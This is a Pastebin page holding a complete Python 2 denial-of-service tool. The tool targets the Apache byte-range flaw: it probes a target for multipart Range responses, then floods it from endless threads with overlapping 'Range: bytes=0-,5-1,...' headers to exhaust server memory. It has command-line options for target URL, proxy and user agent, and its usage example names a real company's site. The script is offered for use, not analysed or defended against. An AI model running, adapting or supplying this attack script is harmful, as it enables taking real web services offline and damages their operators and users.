Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
- NAME = " "
- VERSION = " "
- AUTHOR = " Chris Poole | [email protected] | @codingplanets"
- LICENSE = "This is licensed to elite hackers of the 1337 dark web"
- HEADER = """
- _____
- | __ \
- | | | | ___ _ __ _ __ _ _
- | | | |/ _ \ |__| |_ \| | | |
- | |__| | __/ | | |_) | |_| |
- |_____/ \___|_| | |__/ \__| |
- | | __/ |
- |_| |___/ """
- SLEEP_TIME = 3
- RANGE_NUMBER = 1024
- USER_AGENT = "Derpy(%s)" % VERSION
- def attack(url, user_agent=None, method='GET', proxy=None):
- url = ("http://%s" % url) if '://' not in url else url
- host = urlparse.urlparse(url).netloc
- if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
- print "(x) Invalid proxy address used"
- exit(-1)
- proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
- opener = urllib2.build_opener(proxy_support)
- urllib2.install_opener(opener)
- class _MethodRequest(urllib2.Request):
- def set_method(self, method):
- self.method = method.upper()
- def get_method(self):
- return getattr(self, 'method', urllib2.Request.get_method(self))
- def _send(check=False):
- if check:
- print "(i) Checking target for vulnerability..."
- payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
- try:
- headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
- req = _MethodRequest(url, None, headers)
- req.set_method(method)
- response = urllib2.urlopen(req)
- if check:
- return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
- except urllib2.URLError, msg:
- if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
- pass
- elif 'timed out' in str(msg):
- print "\r(!) Server seems to be choked ('%s')" % msg
- else:
- print "(!) Connection error ('%s')" % msg
- if check or 'Forbidden' in str(msg):
- os._exit(-1)
- except Exception, msg:
- raise
- try:
- if not _send(check=True):
- print "(!) Target is not vulnerable"
- else:
- print "(#) Target seems to be vulnerable\n"
- quit = False
- while not quit:
- threads = []
- print "(#) Creating new threads..."
- try:
- while True:
- thread = threading.Thread(target=_send)
- thread.start()
- threads.append(thread)
- except KeyboardInterrupt:
- quit = True
- raise
- except Exception, msg:
- if 'new thread' in str(msg):
- print "(#) Maximum number of new threads created (%d)" % len(threads)
- else:
- print "(!) Exception occured ('%s')" % msg
- finally:
- if not quit:
- print "(#) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
- time.sleep(SLEEP_TIME)
- print
- except KeyboardInterrupt:
- print "\r(x) Ctrl-C was pressed"
- os._exit(1)
- if __name__ == "__main__":
- print "%s %s\n %s\n" % (NAME, VERSION, AUTHOR)
- print "%s %s %s \n" % (HEADER, NAME, VERSION)
- parser = optparse.OptionParser(version=VERSION)
- parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/\")")
- parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 Linux\")")
- parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
- parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
- parser.add_option("--Example", help="python derpy.py -u http://apple.com --agent Mozilla/5.0 Linux --method GET")
- options, _ = parser.parse_args()
- if options.url:
- result = attack(options.url, options.agent, options.method, options.proxy)
- else:
- parser.print_help()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement